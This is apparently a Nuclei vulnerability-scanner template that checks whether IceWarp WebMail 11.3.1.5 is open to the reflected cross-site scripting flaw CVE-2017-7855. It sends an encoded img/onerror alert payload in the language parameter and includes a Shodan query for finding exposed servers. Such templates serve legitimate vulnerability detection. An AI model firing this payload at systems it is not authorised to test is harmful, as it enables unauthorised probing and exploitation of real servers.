52 lines
1.6 KiB
YAML
52 lines
1.6 KiB
YAML
id: CVE-2017-7855
|
|
|
|
info:
|
|
name: IceWarp WebMail 11.3.1.5 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
IceWarp WebMail 11.3.1.5 is vulnerable to cross-site scripting via the language parameter.
|
|
remediation: Apply the latest security patch or upgrade to a non-vulnerable version of IceWarp WebMail.
|
|
reference:
|
|
- https://technical.nttsecurity.com/post/102eegq/cookies-are-delicious
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-7855
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2017-7855
|
|
cwe-id: CWE-79
|
|
epss-score: 0.0009
|
|
epss-percentile: 0.37683
|
|
cpe: cpe:2.3:a:icewarp:server:11.3.1.5:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: icewarp
|
|
product: server
|
|
shodan-query: title:"icewarp"
|
|
tags: cve,cve2017,xss,icewarp
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'lang=""><img src=x onerror=alert(document.domain)>'
|
|
- 'IceWarp'
|
|
condition: and
|
|
case-insensitive: true
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100e4aa1b07cacbb6405f5911131f1874f193457a4211fbba60681d13db34f7559f022100b478da782d507d2edb0e43567ac4e9a61232ba97bee470889c209251f66f47a6:922c64590222798bb761d5b6d8e72950 |